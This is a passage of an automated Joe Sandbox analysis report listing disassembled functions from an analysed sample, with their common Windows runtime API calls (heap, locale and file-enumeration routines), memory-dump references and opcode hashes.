                                                                                                                                                                                                                                                    • Instruction ID: bf272314b1d9e0f9e3e98149324e0b318262072aa394c9b5a91ed1e36f5de065
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf806aed82742a97ead72a81b410df2b1d345fe2c2114ae3e5f2f4abda08105
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F07D777081D61ACF05CE7CA9662ADBB50FF86336F20415FE002991C1EA0A5A51C21A
                                                                                                                                                                                                                                                    Function 0046E531 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 296 46e531-46e53d 297 46e56f-46e57a call 46ad6d 296->297 298 46e53f-46e541 296->298 305 46e57c-46e57e 297->305 300 46e543-46e544 298->300 301 46e55a-46e56b RtlAllocateHeap 298->301 300->301 302 46e546-46e54d call 46b92d 301->302 303 46e56d 301->303 302->297 308 46e54f-46e558 call 468f08 302->308 303->305 308->297 308->301
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,004631E1,0046186A,?,004660C1,0046186C,0046186A,?,?,?,00463181,004631E1,0046186E,0046186A,0046186A,0046186A), ref: 0046E563
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: b2b6057995fdac38b782c48a38526cef9ec1601964f5822fc21793bed963888c
                                                                                                                                                                                                                                                    • Instruction ID: 67fab3cf4537a87d6f517bc1bcbb5d3e1319d359bbd4b45e99a873a111795664
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2b6057995fdac38b782c48a38526cef9ec1601964f5822fc21793bed963888c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E0EC35A50210B6DA206AD79C00B5B37C89F017F8F250127ED0797291FB68CD0041BF

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00473178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00472B49,00000002,00000000,?,?,?,00472B49,?,00000000), ref: 00473211
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00472B49,00000002,00000000,?,?,?,00472B49,?,00000000), ref: 0047323A
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,00472B49,?,00000000), ref: 0047324F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: 12e681e40145aa0ff8f497e9b6aaa52a7211dfbe77f28ab554e2be9da962c016
                                                                                                                                                                                                                                                    • Instruction ID: 9b13e5e4a49c11dd24fcf911ede3fe845350f42bac64827ad0db8270ee311c3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12e681e40145aa0ff8f497e9b6aaa52a7211dfbe77f28ab554e2be9da962c016
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21E272600100A6DB348F54D905BEB73A6EB50F52B66C8A6E90ED7211E736DF41E358
                                                                                                                                                                                                                                                    Function 00472A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00472B1B
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00472B59
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00472B6C
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00472BB4
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00472BCF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 415426439-0
                                                                                                                                                                                                                                                    • Opcode ID: 6b568e1c2e104a416869f5b9d38ab22a4764a33d9d0abe62077498061e37eebe
                                                                                                                                                                                                                                                    • Instruction ID: fcc28a5cc8f4c8f2791ccf884097eac306eecb2ef3e44111d6301c2d193d6f2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b568e1c2e104a416869f5b9d38ab22a4764a33d9d0abe62077498061e37eebe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8519271A00206AFDB21DFA5CD45AEF77B8FF14700F04846AE508E7250E7B8EA45DB69
                                                                                                                                                                                                                                                    Function 0047375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047384A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                                                    • Opcode ID: be0980f39cfdeb9e8dafc23996faaf3d5b02ea62039a157b32ed8f3dfe3c7a8b
                                                                                                                                                                                                                                                    • Instruction ID: e5e3265ad218b85aed01171f2e8f24dad49a9c58240310711f3ba7dabb130230
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0980f39cfdeb9e8dafc23996faaf3d5b02ea62039a157b32ed8f3dfe3c7a8b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7871F5F59051585EDB209F398C89AEAB7B8AB44305F1481DFE04D93210EA394F84AF18
                                                                                                                                                                                                                                                    Function 00465020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0046502C
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004650F8
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00465111
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0046511B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 0aaf4b8e5a59be4f9934b267f9ebcb13d00f1cf59fee509f35e76fcb1bbb1d0c
                                                                                                                                                                                                                                                    • Instruction ID: 3451892e209e79a9b691c45c56e31972ba498606ef57082667be1df72076d78f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aaf4b8e5a59be4f9934b267f9ebcb13d00f1cf59fee509f35e76fcb1bbb1d0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B312AB5D052189BDF20EF64DC497CDBBB8AF08704F1041AAE40CAB250EB759B858F49
                                                                                                                                                                                                                                                    Function 00472CFF Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00472D53
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00472D9D
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00472E63
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                                                                                                                    • Opcode ID: 4eb9e7e96a68559c6816050ba097ff84ee0c4b1a915f3180924c1ff18a3be2ee
                                                                                                                                                                                                                                                    • Instruction ID: 256397ad624b231a59e8c728706f73e92661168aa3d3bec0da317f385f734e75
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4eb9e7e96a68559c6816050ba097ff84ee0c4b1a915f3180924c1ff18a3be2ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 326181719101179FDB289F25CD82BEB77A8FF04301F1081BBE909C6286E7B8D981DB59
                                                                                                                                                                                                                                                    Function 0046B4B9 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,004631E1), ref: 0046B5B1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,004631E1), ref: 0046B5BB
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00461542,?,?,?,?,?,004631E1), ref: 0046B5C8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                    • Opcode ID: 2f491f31694a22c1ef501ca9b0e9b7915760a5c80b166ab374aeec4c0d8293a3
                                                                                                                                                                                                                                                    • Instruction ID: 9a6bb9f2afc98dc52b40a17c63d088807f0d3f3847ce4f1fd701a53938770748
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f491f31694a22c1ef501ca9b0e9b7915760a5c80b166ab374aeec4c0d8293a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E831D4B4901228ABCB21DF28DD897CDBBB8BF48714F5041EAE40CA7251E7749F858F49
                                                                                                                                                                                                                                                    Function 004736A9 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046F807: HeapAlloc.KERNEL32(00000008,?,004631E1,?,0046E921,00000001,00000364,004631E1,00000003,000000FF,?,004660C1,0046186C,0046186A,?,?), ref: 0046F848
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047384A
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0047393E
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0047397D
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004739B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2701053895-0
                                                                                                                                                                                                                                                    • Opcode ID: 22c254a0ab48c2ac17671c51e018de63a833d362d4834d2d24c263d6e797c4a7
                                                                                                                                                                                                                                                    • Instruction ID: f93665eec0b4134628929d22bb48e4c7914097ed10dc41ef84b0dcd6832e5d2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22c254a0ab48c2ac17671c51e018de63a833d362d4834d2d24c263d6e797c4a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C15146F5500118AEDB249E398C859FFB7A99B85309F14C1AFF40D93301EA389E41AB69
                                                                                                                                                                                                                                                    Function 00472FB1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00473005
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: b24dd53c9f7caec2fe5784a269c71daa429c402e9f5b17bb8d1295e0c67d80b3
                                                                                                                                                                                                                                                    • Instruction ID: 53fae60b9895eecfa1be5c8ad3605473bb36ab5c6aa5888920c4a4af17f4ca68
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b24dd53c9f7caec2fe5784a269c71daa429c402e9f5b17bb8d1295e0c67d80b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5521D3B1611246ABDF289E2ADC41ABB33A8EF04306B10807FF905D6249EB389E00D759
                                                                                                                                                                                                                                                    Function 004730D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00473125
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: 73438e1898ec46bcabee947f72a54487b3e5f60d6fb725e264f648b797a10e08
                                                                                                                                                                                                                                                    • Instruction ID: 114d7c2ccd805271d997ccfef1aa5e5251c99438357fa4914b7e96013da169e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73438e1898ec46bcabee947f72a54487b3e5f60d6fb725e264f648b797a10e08
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E112072610202ABCB14AF29DC42ABB73E8EF04315B10417FF505D7240EB38EE019798
                                                                                                                                                                                                                                                    Function 00472C64 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00472CFF,00000001,00000000,?,-00000050,?,00472AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00472CD6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
